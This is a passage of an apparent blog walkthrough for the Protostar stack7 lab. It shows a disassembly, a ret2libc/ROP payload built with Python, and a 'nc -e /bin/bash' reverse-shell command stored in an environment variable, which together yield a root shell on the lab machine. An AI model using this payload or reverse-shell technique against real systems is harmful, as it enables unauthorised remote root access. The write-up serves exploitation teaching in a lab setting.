span class="code-line"span class="normal"226/span/span
span class="code-line"span class="normal"227/span/span
span class="code-line"span class="normal"228/span/span
span class="code-line"span class="normal"229/span/span
span class="code-line"span class="normal"230/span/span
span class="code-line"span class="normal"231/span/span
span class="code-line"span class="normal"232/span/span
span class="code-line"span class="normal"233/span/span
span class="code-line"span class="normal"234/span/span
span class="code-line"span class="normal"235/span/span
span class="code-line"span class="normal"236/span/span
span class="code-line"span class="normal"237/span/span
span class="code-line"span class="normal"238/span/span
span class="code-line"span class="normal"239/span/span
span class="code-line"span class="normal"240/span/span
span class="code-line"span class="normal"241/span/span
span class="code-line"span class="normal"242/span/span
span class="code-line"span class="normal"243/span/span
span class="code-line"span class="normal"244/span/span
span class="code-line"span class="normal"245/span/span
span class="code-line"span class="normal"246/span/span
span class="code-line"span class="normal"247/span/span
span class="code-line"span class="normal"248/span/span
span class="code-line"span class="normal"249/span/span
span class="code-line"span class="normal"250/span/span
span class="code-line"span class="normal"251/span/span
span class="code-line"span class="normal"252/span/span
span class="code-line"span class="normal"253/span/span
span class="code-line"span class="normal"254/span/span
span class="code-line"span class="normal"255/span/span
span class="code-line"span class="normal"256/span/span
span class="code-line"span class="normal"257/span/span
span class="code-line"span class="normal"258/span/span
span class="code-line"span class="normal"259/span/span
span class="code-line"span class="normal"260/span/span
span class="code-line"span class="normal"261/span/span
span class="code-line"span class="normal"262/span/span
span class="code-line"span class="normal"263/span/span
span class="code-line"span class="normal"264/span/span
span class="code-line"span class="normal"265/span/span
span class="code-line"span class="normal"266/span/span
span class="code-line"span class="normal"267/span/span
span class="code-line"span class="normal"268/span/span
span class="code-line"span class="normal"269/span/span
span class="code-line"span class="normal"270/span/span
span class="code-line"span class="normal"271/span/span
span class="code-line"span class="normal"272/span/span
span class="code-line"span class="normal"273/span/span
span class="code-line"span class="normal"274/span/span
span class="code-line"span class="normal"275/span/span
span class="code-line"span class="normal"276/span/span
span class="code-line"span class="normal"277/span/span
span class="code-line"span class="normal"278/span/span
span class="code-line"span class="normal"279/span/span
span class="code-line"span class="normal"280/span/span
span class="code-line"span class="normal"281/span/span
span class="code-line"span class="normal"282/span/span
span class="code-line"span class="normal"283/span/span
span class="code-line"span class="normal"284/span/span
span class="code-line"span class="normal"285/span/span
span class="code-line"span class="normal"286/span/span
span class="code-line"span class="normal"287/span/span
span class="code-line"span class="normal"288/span/span
span class="code-line"span class="normal"289/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"user@protostar:/opt/protostar/bin$ objdump -d ./stack7 -M intel/span/span
span class="code-line"/span
span class="code-line"span class="nl"./stack7/spanspan class="p":/span     file format span class="s"elf32-i386/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048354/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048354:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048355:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048357:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048358:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 804835b:   e8 00 00 00 00          call   8048360 lt;_init+0xcgt;/span/span
span class="code-line"span class="x" 8048360:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048361:   81 c3 dc 13 00 00       add    ebx,0x13dc/span/span
span class="code-line"span class="x" 8048367:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]/span/span
span class="code-line"span class="x" 804836d:   85 d2                   test   edx,edx/span/span
span class="code-line"span class="x" 804836f:   74 05                   je     8048376 lt;_init+0x22gt;/span/span
span class="code-line"span class="x" 8048371:   e8 1e 00 00 00          call   8048394 lt;__gmon_start__@pltgt;/span/span
span class="code-line"span class="x" 8048376:   e8 25 01 00 00          call   80484a0 lt;frame_dummygt;/span/span
span class="code-line"span class="x" 804837b:   e8 50 02 00 00          call   80485d0 lt;__do_global_ctors_auxgt;/span/span
span class="code-line"span class="x" 8048380:   58                      pop    eax/span/span
span class="code-line"span class="x" 8048381:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048382:   c9                      leave  /span/span
span class="code-line"span class="x" 8048383:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048384/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048384:   ff 35 40 97 04 08       push   DWORD PTR ds:0x8049740/span/span
span class="code-line"span class="x" 804838a:   ff 25 44 97 04 08       jmp    DWORD PTR ds:0x8049744/span/span
span class="code-line"span class="x" 8048390:   00 00                   add    BYTE PTR [eax],al/span/span
span class="code-line"span class="x"    .../span/span
span class="code-line"/span
span class="code-line"span class="mh"08048394/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048394:   ff 25 48 97 04 08       jmp    DWORD PTR ds:0x8049748/span/span
span class="code-line"span class="x" 804839a:   68 00 00 00 00          push   0x0/span/span
span class="code-line"span class="x" 804839f:   e9 e0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483a4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"gets@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483a4:   ff 25 4c 97 04 08       jmp    DWORD PTR ds:0x804974c/span/span
span class="code-line"span class="x" 80483aa:   68 08 00 00 00          push   0x8/span/span
span class="code-line"span class="x" 80483af:   e9 d0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483b4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483b4:   ff 25 50 97 04 08       jmp    DWORD PTR ds:0x8049750/span/span
span class="code-line"span class="x" 80483ba:   68 10 00 00 00          push   0x10/span/span
span class="code-line"span class="x" 80483bf:   e9 c0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_exit@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483c4:   ff 25 54 97 04 08       jmp    DWORD PTR ds:0x8049754/span/span
span class="code-line"span class="x" 80483ca:   68 18 00 00 00          push   0x18/span/span
span class="code-line"span class="x" 80483cf:   e9 b0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483d4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fflush@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483d4:   ff 25 58 97 04 08       jmp    DWORD PTR ds:0x8049758/span/span
span class="code-line"span class="x" 80483da:   68 20 00 00 00          push   0x20/span/span
span class="code-line"span class="x" 80483df:   e9 a0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483e4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483e4:   ff 25 5c 97 04 08       jmp    DWORD PTR ds:0x804975c/span/span
span class="code-line"span class="x" 80483ea:   68 28 00 00 00          push   0x28/span/span
span class="code-line"span class="x" 80483ef:   e9 90 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483f4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strdup@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483f4:   ff 25 60 97 04 08       jmp    DWORD PTR ds:0x8049760/span/span
span class="code-line"span class="x" 80483fa:   68 30 00 00 00          push   0x30/span/span
span class="code-line"span class="x" 80483ff:   e9 80 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048410/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048410:   31 ed                   xor    ebp,ebp/span/span
span class="code-line"span class="x" 8048412:   5e                      pop    esi/span/span
span class="code-line"span class="x" 8048413:   89 e1                   mov    ecx,esp/span/span
span class="code-line"span class="x" 8048415:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 8048418:   50                      push   eax/span/span
span class="code-line"span class="x" 8048419:   54                      push   esp/span/span
span class="code-line"span class="x" 804841a:   52                      push   edx/span/span
span class="code-line"span class="x" 804841b:   68 60 85 04 08          push   0x8048560/span/span
span class="code-line"span class="x" 8048420:   68 70 85 04 08          push   0x8048570/span/span
span class="code-line"span class="x" 8048425:   51                      push   ecx/span/span
span class="code-line"span class="x" 8048426:   56                      push   esi/span/span
span class="code-line"span class="x" 8048427:   68 45 85 04 08          push   0x8048545/span/span
span class="code-line"span class="x" 804842c:   e8 83 ff ff ff          call   80483b4 lt;__libc_start_main@pltgt;/span/span
span class="code-line"span class="x" 8048431:   f4                      hlt    /span/span
span class="code-line"span class="x" 8048432:   90                      nop/span/span
span class="code-line"span class="x" 8048433:   90                      nop/span/span
span class="code-line"span class="x" 8048434:   90                      nop/span/span
span class="code-line"span class="x" 8048435:   90                      nop/span/span
span class="code-line"span class="x" 8048436:   90                      nop/span/span
span class="code-line"span class="x" 8048437:   90                      nop/span/span
span class="code-line"span class="x" 8048438:   90                      nop/span/span
span class="code-line"span class="x" 8048439:   90                      nop/span/span
span class="code-line"span class="x" 804843a:   90                      nop/span/span
span class="code-line"span class="x" 804843b:   90                      nop/span/span
span class="code-line"span class="x" 804843c:   90                      nop/span/span
span class="code-line"span class="x" 804843d:   90                      nop/span/span
span class="code-line"span class="x" 804843e:   90                      nop/span/span
span class="code-line"span class="x" 804843f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048440/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048440:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048441:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048443:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048444:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048447:   80 3d 84 97 04 08 00    cmp    BYTE PTR ds:0x8049784,0x0/span/span
span class="code-line"span class="x" 804844e:   75 3f                   jne    804848f lt;__do_global_dtors_aux+0x4fgt;/span/span
span class="code-line"span class="x" 8048450:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048455:   bb 60 96 04 08          mov    ebx,0x8049660/span/span
span class="code-line"span class="x" 804845a:   81 eb 5c 96 04 08       sub    ebx,0x804965c/span/span
span class="code-line"span class="x" 8048460:   c1 fb 02                sar    ebx,0x2/span/span
span class="code-line"span class="x" 8048463:   83 eb 01                sub    ebx,0x1/span/span
span class="code-line"span class="x" 8048466:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048468:   73 1e                   jae    8048488 lt;__do_global_dtors_aux+0x48gt;/span/span
span class="code-line"span class="x" 804846a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]/span/span
span class="code-line"span class="x" 8048470:   83 c0 01                add    eax,0x1/span/span
span class="code-line"span class="x" 8048473:   a3 88 97 04 08          mov    ds:0x8049788,eax/span/span
span class="code-line"span class="x" 8048478:   ff 14 85 5c 96 04 08    call   DWORD PTR [eax*4+0x804965c]/span/span
span class="code-line"span class="x" 804847f:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048484:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048486:   72 e8                   jb     8048470 lt;__do_global_dtors_aux+0x30gt;/span/span
span class="code-line"span class="x" 8048488:   c6 05 84 97 04 08 01    mov    BYTE PTR ds:0x8049784,0x1/span/span
span class="code-line"span class="x" 804848f:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 8048492:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048493:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048494:   c3                      ret    /span/span
span class="code-line"span class="x" 8048495:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048499:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484a0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484a1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484a3:   83 ec 18                sub    esp,0x18/span/span
span class="code-line"span class="x" 80484a6:   a1 64 96 04 08          mov    eax,ds:0x8049664/span/span
span class="code-line"span class="x" 80484ab:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484ad:   74 12                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484af:   b8 00 00 00 00          mov    eax,0x0/span/span
span class="code-line"span class="x" 80484b4:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484b6:   74 09                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484b8:   c7 04 24 64 96 04 08    mov    DWORD PTR [esp],0x8049664/span/span
span class="code-line"span class="x" 80484bf:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80484c1:   c9                      leave  /span/span
span class="code-line"span class="x" 80484c2:   c3                      ret    /span/span
span class="code-line"span class="x" 80484c3:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"getpath/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484c4:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484c5:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484c7:   83 ec 68                sub    esp,0x68/span/span
span class="code-line"span class="x" 80484ca:   b8 20 86 04 08          mov    eax,0x8048620/span/span
span class="code-line"span class="x" 80484cf:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484d2:   e8 0d ff ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 80484d7:   a1 80 97 04 08          mov    eax,ds:0x8049780/span/span
span class="code-line"span class="x" 80484dc:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484df:   e8 f0 fe ff ff          call   80483d4 lt;fflush@pltgt;/span/span
span class="code-line"span class="x" 80484e4:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 80484e7:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484ea:   e8 b5 fe ff ff          call   80483a4 lt;gets@pltgt;/span/span
span class="code-line"span class="x" 80484ef:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]/span/span
span class="code-line"span class="x" 80484f2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax/span/span
span class="code-line"span class="x" 80484f5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 80484f8:   25 00 00 00 b0          and    eax,0xb0000000/span/span
span class="code-line"span class="x" 80484fd:   3d 00 00 00 b0          cmp    eax,0xb0000000/span/span
span class="code-line"span class="x" 8048502:   75 20                   jne    8048524 lt;getpath+0x60gt;/span/span
span class="code-line"span class="x" 8048504:   b8 34 86 04 08          mov    eax,0x8048634/span/span
span class="code-line"span class="x" 8048509:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 804850c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048510:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048513:   e8 cc fe ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 8048518:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1/span/span
span class="code-line"span class="x" 804851f:   e8 a0 fe ff ff          call   80483c4 lt;_exit@pltgt;/span/span
span class="code-line"span class="x" 8048524:   b8 40 86 04 08          mov    eax,0x8048640/span/span
span class="code-line"span class="x" 8048529:   8d 55 b4                lea    edx,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804852c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048530:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048533:   e8 ac fe ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 8048538:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804853b:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 804853e:   e8 b1 fe ff ff          call   80483f4 lt;strdup@pltgt;/span/span
span class="code-line"span class="x" 8048543:   c9                      leave  /span/span
span class="code-line"span class="x" 8048544:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"08048545/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048545:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048546:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048548:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 804854b:   e8 74 ff ff ff          call   80484c4 lt;getpathgt;/span/span
span class="code-line"span class="x" 8048550:   89 ec                   mov    esp,ebp/span/span
span class="code-line"span class="x" 8048552:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048553:   c3                      ret    /span/span
span class="code-line"span class="x" 8048554:   90                      nop/span/span
span class="code-line"span class="x" 8048555:   90                      nop/span/span
span class="code-line"span class="x" 8048556:   90                      nop/span/span
span class="code-line"span class="x" 8048557:   90                      nop/span/span
span class="code-line"span class="x" 8048558:   90                      nop/span/span
span class="code-line"span class="x" 8048559:   90                      nop/span/span
span class="code-line"span class="x" 804855a:   90                      nop/span/span
span class="code-line"span class="x" 804855b:   90                      nop/span/span
span class="code-line"span class="x" 804855c:   90                      nop/span/span
span class="code-line"span class="x" 804855d:   90                      nop/span/span
span class="code-line"span class="x" 804855e:   90                      nop/span/span
span class="code-line"span class="x" 804855f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048560/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048560:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048561:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048563:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048564:   c3                      ret    /span/span
span class="code-line"span class="x" 8048565:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048569:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048570/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048570:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048571:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048573:   57                      push   edi/span/span
span class="code-line"span class="x" 8048574:   56                      push   esi/span/span
span class="code-line"span class="x" 8048575:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048576:   e8 4f 00 00 00          call   80485ca lt;__i686.get_pc_thunk.bxgt;/span/span
span class="code-line"span class="x" 804857b:   81 c3 c1 11 00 00       add    ebx,0x11c1/span/span
span class="code-line"span class="x" 8048581:   83 ec 1c                sub    esp,0x1c/span/span
span class="code-line"span class="x" 8048584:   e8 cb fd ff ff          call   8048354 lt;_initgt;/span/span
span class="code-line"span class="x" 8048589:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]/span/span
span class="code-line"span class="x" 804858f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]/span/span
span class="code-line"span class="x" 8048595:   29 c7                   sub    edi,eax/span/span
span class="code-line"span class="x" 8048597:   c1 ff 02                sar    edi,0x2/span/span
span class="code-line"span class="x" 804859a:   85 ff                   test   edi,edi/span/span
span class="code-line"span class="x" 804859c:   74 24                   je     80485c2 lt;__libc_csu_init+0x52gt;/span/span
span class="code-line"span class="x" 804859e:   31 f6                   xor    esi,esi/span/span
span class="code-line"span class="x" 80485a0:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]/span/span
span class="code-line"span class="x" 80485a3:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax/span/span
span class="code-line"span class="x" 80485a7:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]/span/span
span class="code-line"span class="x" 80485aa:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax/span/span
span class="code-line"span class="x" 80485ae:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]/span/span
span class="code-line"span class="x" 80485b1:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80485b4:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]/span/span
span class="code-line"span class="x" 80485bb:   83 c6 01                add    esi,0x1/span/span
span class="code-line"span class="x" 80485be:   39 fe                   cmp    esi,edi/span/span
span class="code-line"span class="x" 80485c0:   72 de                   jb     80485a0 lt;__libc_csu_init+0x30gt;/span/span
span class="code-line"span class="x" 80485c2:   83 c4 1c                add    esp,0x1c/span/span
span class="code-line"span class="x" 80485c5:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485c6:   5e                      pop    esi/span/span
span class="code-line"span class="x" 80485c7:   5f                      pop    edi/span/span
span class="code-line"span class="x" 80485c8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485c9:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"080485ca/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485ca:   8b 1c 24                mov    ebx,DWORD PTR [esp]/span/span
span class="code-line"span class="x" 80485cd:   c3                      ret    /span/span
span class="code-line"span class="x" 80485ce:   90                      nop/span/span
span class="code-line"span class="x" 80485cf:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_ctors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485d0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485d1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485d3:   53                      push   ebx/span/span
span class="code-line"span class="x" 80485d4:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 80485d7:   a1 54 96 04 08          mov    eax,ds:0x8049654/span/span
span class="code-line"span class="x" 80485dc:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485df:   74 13                   je     80485f4 lt;__do_global_ctors_aux+0x24gt;/span/span
span class="code-line"span class="x" 80485e1:   bb 54 96 04 08          mov    ebx,0x8049654/span/span
span class="code-line"span class="x" 80485e6:   66 90                   xchg   ax,ax/span/span
span class="code-line"span class="x" 80485e8:   83 eb 04                sub    ebx,0x4/span/span
span class="code-line"span class="x" 80485eb:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80485ed:   8b 03                   mov    eax,DWORD PTR [ebx]/span/span
span class="code-line"span class="x" 80485ef:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485f2:   75 f4                   jne    80485e8 lt;__do_global_ctors_aux+0x18gt;/span/span
span class="code-line"span class="x" 80485f4:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 80485f7:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485f8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485f9:   c3                      ret    /span/span
span class="code-line"span class="x" 80485fa:   90                      nop/span/span
span class="code-line"span class="x" 80485fb:   90                      nop/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485fc/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485fc:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485fd:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485ff:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048600:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048603:   e8 00 00 00 00          call   8048608 lt;_fini+0xcgt;/span/span
span class="code-line"span class="x" 8048608:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048609:   81 c3 34 11 00 00       add    ebx,0x1134/span/span
span class="code-line"span class="x" 804860f:   e8 2c fe ff ff          call   8048440 lt;__do_global_dtors_auxgt;/span/span
span class="code-line"span class="x" 8048614:   59                      pop    ecx/span/span
span class="code-line"span class="x" 8048615:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048616:   c9                      leave  /span/span
span class="code-line"span class="x" 8048617:   c3                      ret/span/span
span class="code-line"/code/pre/div
/td/tr/table
pOK, so the codepop, ret/code starts at code0x80485f8/code and the coderet/code is at code0x80485f9/code./p
pNow we just need to create the environment variable and find it in memory:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"export/span span class="nv"NCCMD/spanspan class="o"=/spanspan class="s2"quot;nc -e /bin/bash 127.0.0.1 9000quot;/span/span
span class="code-line"/code/pre/div
/td/tr/table
pTo find out where it will be in memory I'm going to use the same a href="/assets/code/x86-32-linux/getenvaddr.c"C application/a that I've used before, which uses codegetenv/code to work it out:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangcc -o /tmp/env /tmp/env.c/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env/span
span class="code-line"span class="go"Usage: /tmp/env lt;environment variablegt; lt;target program namegt;/span/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env NCCMD ./stack7/span
span class="code-line"span class="go"NCCMD will be at 0xbfffff6e/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know that the distance from the start of the payload to overwriting the return address will be the same as before because the application is identical in that sense./p
pNow we have all of the information to exploit it:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xf9\x85\x04\x08quot; + quot;\x80\xec\xf2\xb7quot; + quot;\xf8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\xb0\xff\xec\xb7quot; + quot;JUNKquot; + quot;\x6e\xff\xff\xbfquot;#39;/span span class="p"|/span ./stack7/span
span class="code-line"span class="go"input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��������/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pPWNED! :-)/p
h2Conclusion/h2
pThere are normally a number of ways to exploit a single vulnerablity so while you are learning it is best to try to exploit it in as many ways as possible because some might work in some situations while others might not./p
pRet2Libc is very powerful and beats NX completely but ROP is even more powerful and providing there are enough different ROP gadgets, you can create the whole shellcode using nothing but ROP gadgets but this requires the application to be quite big./p
h2Further Reading/h2
pFor more indepth information about Ret2Libc see a href="http://phrack.org/issues/58/4.html" target="_blank"this/a article on phrack./p
pRead emHacking: The Art Of Exploitation/em by emJon Erickson/em for more information about all of the attacks I've discussed so far and more./p

An Easy Windows Crackme

